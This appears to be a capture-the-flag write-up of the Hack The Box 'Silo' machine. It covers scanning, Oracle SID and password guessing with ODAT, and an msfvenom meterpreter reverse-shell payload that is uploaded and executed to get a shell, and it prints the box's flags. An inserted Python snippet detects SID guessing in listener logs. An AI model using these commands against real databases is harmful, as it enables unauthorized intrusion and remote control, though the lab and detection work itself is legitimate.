Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Silo Windows

Tools and techniques used: ODAT, msfvenom

Recon

Basic_10.10.10.82.nmap 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Exploitation: Oracle Database Attacking Tool

We are going to install ODAT to query the Oracle database and find a way to exploit it.

git clone https://github.com/quentinhardy/odat
cd odat/
git submodule init
git submodule update
sudo apt-get install libaio1 python-dev alien python-pip

Get the Instant Client basic, sdk (devel) and sqlplus packages from the Oracle web site:

X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html

Generate DEB packages from the RPM packages

alien --to-deb *.rpm

Install the DEB packages

dpkg -i *.deb

Finally, we need to edit /etc/profile and add the following lines:

export ORACLE_HOME=/usr/lib/oracle/19.3/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

Sometimes running odat.py throws an error saying that the cx_Oracle dependency module is missing. If that happens, install it:

pip2 install cx_Oracle

odat

We start odat and use the sidguesser module:

python odat.py sidguesser -s 10.10.10.82 -p 1521

Sidguesser returns two potentially valid SIDs: XE, XEXDB
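On the defender's side, a SID-guessing run like the one above appears in the listener log as a burst of refused connections from one source, each naming a different SID. The following is an added example, not part of the original post or of ODAT: it parses text listener.log entries and flags sources that try many unknown SIDs. The sample lines, the threshold and the function names are constructed for illustration and assume the standard " * "-separated listener.log layout.

```python
import re
from collections import defaultdict

SRC_RE = re.compile(r"\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=([^)]+)\)")
UNKNOWN_SID = "12505"  # TNS-12505: listener does not know the SID in the connect descriptor


def parse_establish(line):
    """Return (source_ip, sid, return_code) for an 'establish' entry, else None."""
    # Fields: timestamp * connect data * protocol info * event * SID * return code
    fields = [f.strip() for f in line.split(" * ")]
    if len(fields) != 6 or fields[3] != "establish":
        return None  # status entries, TNS-xxxxx continuation lines, etc.
    src = SRC_RE.search(fields[2])
    return (src.group(1), fields[4], fields[5]) if src else None


def sid_guessing_sources(lines, threshold=5):
    """Map source IP -> sorted rejected SIDs, for sources with >= threshold distinct ones."""
    rejected = defaultdict(set)
    for line in lines:
        entry = parse_establish(line)
        if entry and entry[2] == UNKNOWN_SID:
            rejected[entry[0]].add(entry[1])
    return {ip: sorted(sids) for ip, sids in rejected.items() if len(sids) >= threshold}


def sample_line(sid, src, rc):
    """Build one constructed listener.log line (sample data, not captured from the target)."""
    return ("08-MAR-2018 10:16:10 * (CONNECT_DATA=(SID=%s)(CID=(PROGRAM=client)"
            "(HOST=host)(USER=user))) * (ADDRESS=(PROTOCOL=tcp)(HOST=%s)(PORT=40112))"
            " * establish * %s * %s" % (sid, src, sid, rc))


SAMPLE_LOG = (
    [sample_line("XE", "10.10.10.5", "0")]                        # normal application login
    + [sample_line("ORCL", "10.10.10.7", "12505")]                # single typo, below threshold
    + [sample_line(s, "10.10.14.25", "12505")
       for s in ("AAA", "ORCL", "PROD", "TEST", "DB01", "SID1")]  # burst of unknown SIDs
    + ["TNS-12505: TNS:listener does not currently know of SID given in connect descriptor"]
    + [sample_line("XE", "10.10.14.25", "0")]                     # a SID the listener accepts
)

if __name__ == "__main__":
    for ip, sids in sid_guessing_sources(SAMPLE_LOG).items():
        print("possible SID guessing from %s: %d unknown SIDs %s" % (ip, len(sids), sids))
```

A low threshold over a short time window works here because legitimate clients are configured with a fixed SID and rarely produce more than an occasional 12505.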

Time to get some creds by using passwordguesser

python odat.py passwordguesser -s 10.10.10.82 -d XE
Valid credentials found: scott/tiger.

We are going to use the utlfile module to upload a reverse shell generated with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=9999 -f exe -o evil.exe
python odat.py utlfile --sysdba -s 10.10.10.82 -d XE -U scott -P tiger --putFile /temp evil.exe /root/Desktop/evil.exe

Then we execute our shell using the externaltable module from odat:

python odat.py externaltable --sysdba -s 10.10.10.82 -d XE -U scott -P tiger --exec /temp evil.exe

Finally we got a root shell.

FLAGS

ROOT : "cd39ea0af657a495e33bc59c7836faf6"
USER : "92ede778a1cc8d27cb6623055c331617"